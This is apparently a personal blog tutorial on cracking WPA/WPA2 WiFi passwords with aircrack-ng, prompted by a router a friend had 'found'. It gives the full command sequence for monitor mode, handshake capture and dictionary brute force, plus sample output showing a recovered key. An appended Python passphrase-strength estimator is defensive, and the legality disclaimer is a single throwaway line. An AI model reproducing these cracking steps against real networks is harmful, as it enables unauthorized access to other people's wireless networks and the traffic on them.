Crack WiFi Passwords with aircrack

Cracked my first wireless network today. A friend I made at a phone unlocking shop here in Kono district had a NetGear router he "found" and he couldn't reset the password to use it. I wanted to try to see if I could get into it myself before just restoring it to factory defaults. A few hours later with aircrack and its docs, I got as far as starting a brute-force attack on the router with a huge dictionary word list. Having made it far enough to just let it sit for the next 24 hours and crack, I decided to just reset the router to its factory defaults, make the password an extremely secure "aaaaa123", and then let it run its course for a few minutes. And voilà, cracked it!

Make sure to run everything with root privileges.

Put your wireless card into "monitor" mode (normally in "managed")

$ sudo ifconfig wlan0 down
$ sudo iwconfig wlan0 mode monitor
$ sudo ifconfig wlan0 up

Start listening on your wlan0 interface

$ airmon-ng start wlan0

Begin sniffing packets to see available Access points and their MAC addresses

$ airodump-ng wlan0

Get a password handshake by capturing packets and saving into a specified file to be used later.

$ airodump-ng --channel <the AP channel> --bssid <MAC of AP> --write some_file_name mon0

Brute-force the Access Point with a dictionary of passwords.

$ aircrack-ng -b <MAC of AP> -w <wordlist file> some_file_name.cap

If you don't have a dictionary file you can use wordfield to generate passwords and pipe them in.

$ wordfield -a -n 8 10 | sudo aircrack-ng -w - -b <MAC of AP> your-cap-file.cap -K

Results from a later test

                           Aircrack-ng 1.1

              [00:16:00] 1588024 keys tested (1668.83 k/s)

                    KEY FOUND! [ jeffnetwork ]

Master Key     : 6D 02 BB DB 2C 6C 59 51 1E 35 E1 D3 A5 C0 5F 8A
                 F3 A7 BB 1A DF DF 5A 3F C8 74 DB 6F DF 58 63 66

Transient Key  : 06 BC D9 30 12 74 1A 25 A8 3A E6 1B 14 EC 71 05
                 F3 6E 51 C5 A0 8E A1 63 2D 07 3A 2D C5 A0 15 A9
                 A8 3E 76 D7 99 51 5C 20 DC 1C A9 E3 FD 77 22 5F
                 5E F8 A5 65 EB 88 A7 AB AB 6F 56 A6 28 14 4F E2

EAPOL HMAC     : 93 44 CA 90 0E 15 04 B5 49 E9 10 FB FF 2A 54 AF
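
As an added example (not from the original post), this Python code audits a candidate WPA/WPA2 passphrase against the guess rate in the output above (1668.83 keys per second). The function names and the sample wordlist are constructed for illustration; the charset-based figure is an upper bound, and wordlist membership is what decides the outcome.

```python
import string

# Guess rate reported in the aircrack-ng output above (keys per second).
OBSERVED_RATE = 1668.83
SECONDS_PER_YEAR = 365.25 * 24 * 3600
CLASSES = (string.ascii_lowercase, string.ascii_uppercase,
           string.digits, string.punctuation + " ")


def charset_size(passphrase):
    """Total size of the character classes the passphrase draws from."""
    return sum(len(c) for c in CLASSES if any(ch in c for ch in passphrase))


def audit(passphrase, wordlist=(), rate=OBSERVED_RATE):
    """Estimate offline-guessing exposure of a WPA/WPA2-PSK passphrase."""
    # WPA/WPA2 passphrases are 8 to 63 printable ASCII characters.
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("passphrase must be 8 to 63 characters")
    if not all(32 <= ord(ch) <= 126 for ch in passphrase):
        raise ValueError("passphrase must be printable ASCII")

    # Dictionary case: time to reach the entry at its position in the list.
    words = list(wordlist)
    dictionary_seconds = None
    if passphrase in words:
        dictionary_seconds = (words.index(passphrase) + 1) / rate

    # Exhaustive case: every string of this length over the same classes.
    keyspace = charset_size(passphrase) ** len(passphrase)
    return {
        "in_wordlist": dictionary_seconds is not None,
        "dictionary_seconds": dictionary_seconds,
        "exhaustive_years": keyspace / rate / SECONDS_PER_YEAR,
    }


if __name__ == "__main__":
    # Constructed sample wordlist, not a real dictionary file.
    sample_wordlist = ["password", "12345678", "aaaaa123", "jeffnetwork"]
    for candidate in ("aaaaa123", "jeffnetwork", "T7#qv!Lm2$xZ9@pR"):
        print(candidate, audit(candidate, sample_wordlist))
```
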

Note: Hacking someone's password is illegal, so make sure to abide by the laws set in place by your local law enforcement agency and all that.
